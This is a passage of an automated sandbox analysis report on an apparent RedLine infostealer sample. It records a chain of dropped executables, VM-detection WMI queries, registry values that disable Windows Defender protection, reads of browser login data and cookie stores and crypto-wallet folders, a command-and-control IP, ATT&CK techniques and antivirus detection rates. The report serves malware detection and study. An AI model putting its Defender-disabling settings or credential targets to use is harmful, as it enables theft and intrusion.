                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE60E52 push eax; ret 3_2_00007FFBACE60ECE
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE60ED1 push eax; ret 3_2_00007FFBACE61009
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE6077D push eax; ret 3_2_00007FFBACE607C7
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE60C34 push eax; ret 3_2_00007FFBACE60C8E
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A4202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A4202A
                          Source: ijx54ck.exe.2.dr Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A41AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A41AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00321AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00321AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_010D1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe TID: 5308 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 1848 Thread sleep time: -10145709240540247s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 4836 Thread sleep count: 2666 > 30
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe TID: 1260 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Window / User API: threadDelayed 2666
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2450
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-2450
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A45467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A45467
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A42390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A42390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00322390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00322390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_010D2390
                          Source: kxL91dA.exe, 00000005.00000002.327812187.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A4202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A4202A
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Memory allocated: page read and write | page guard
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A46F40 SetUnhandledExceptionFilter,0_2_00A46F40
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A46CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A46CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00326F40 SetUnhandledExceptionFilter,1_2_00326F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe Code function: 1_2_00326CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00326CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D6F40 SetUnhandledExceptionFilter,2_2_010D6F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe Code function: 2_2_010D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_010D6CF0
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A418A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00A418A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A47155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00A47155
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exe Code function: 0_2_00A42BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00A42BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Code function: 3_2_00007FFBACE607CA GetUserNameA,3_2_00007FFBACE607CA

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: kxL91dA.exe, 00000005.00000002.336955649.0000000005B00000.00000004.00000020.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.327812187.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: kxL91dA.exe PID: 3228, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED
                          Source: Yara match File source: 0.3.21fvBVFMsn.exe.4a8da20.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.3.21fvBVFMsn.exe.4a8da20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                          Remote Access Functionality

                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: kxL91dA.exe PID: 3228, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPED

                          MITRE ATT&CK matrix columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact

                          Techniques shown with a count, by tactic:
                          Execution: 221 Windows Management Instrumentation; 2 Native API; 2 Command and Scripting Interpreter; 1 Service Execution
                          Persistence: 1 DLL Side-Loading; 1 Windows Service
                          Privilege Escalation: 1 DLL Side-Loading; 2 Bypass User Access Control; 1 Access Token Manipulation; 1 Windows Service; 1 Process Injection
                          Defense Evasion: 21 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 2 Bypass User Access Control; 1 Masquerading; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 Process Injection; 1 Rundll32
                          Credential Access: 1 OS Credential Dumping
                          Discovery: 1 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 127 System Information Discovery; 331 Security Software Discovery; 11 Process Discovery; 231 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Owner/User Discovery
                          Collection: 1 Archive Collected Data; 2 Data from Local System
                          Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 1 Application Layer Protocol
                          Impact: 1 System Shutdown/Reboot

                          Behavior Graph ID: 811560 Sample: 21fvBVFMsn.exe Startdate: 19/02/2023 Architecture: WINDOWS Score: 100
                          [Behavior graph: 21fvBVFMsn.exe dropped sEm51bM.exe and nIp99Jf.exe and started sEm51bM.exe; sEm51bM.exe dropped sMt14vz.exe and lbt58JR.exe and started sMt14vz.exe; sMt14vz.exe dropped kxL91dA.exe and ijx54ck.exe and started both. kxL91dA.exe is linked to the DNS/IP node 193.233.20.17, 4139, 49699 (REDCOM-ASRedcomKhabarovskRussiaRU, Russian Federation) and to the signature "Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)"; ijx54ck.exe is linked to "Disable Windows Defender notifications (registry)" and "Disable Windows Defender real time protection (registry)".]

                          Source | Detection | Scanner | Label
                          21fvBVFMsn.exe | 77% | ReversingLabs | Win32.Trojan.RedLine
                          21fvBVFMsn.exe | 56% | Virustotal |
                          21fvBVFMsn.exe | 100% | Avira | HEUR/AGEN.1252166
                          21fvBVFMsn.exe | 100% | Joe Sandbox ML |

                          Source | Detection | Scanner | Label
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe | 100% | Avira | HEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe | 100% | Avira | HEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe | 100% | Avira | HEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe | 72% | ReversingLabs | Win32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe | 69% | Virustotal |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe | 69% | ReversingLabs | Win32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe | 55% | Virustotal |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe | 46% | ReversingLabs | Win32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe | 41% | Virustotal |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe | 69% | ReversingLabs | Win32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe | 85% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine

                          Source | Detection | Scanner | Label
                          0.2.21fvBVFMsn.exe.a40000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          1.0.sEm51bM.exe.320000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          2.2.sMt14vz.exe.10d0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          5.0.kxL91dA.exe.4e0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166
                          1.3.sEm51bM.exe.4756820.0.unpack | 100% | Avira | TR/Patched.Gen
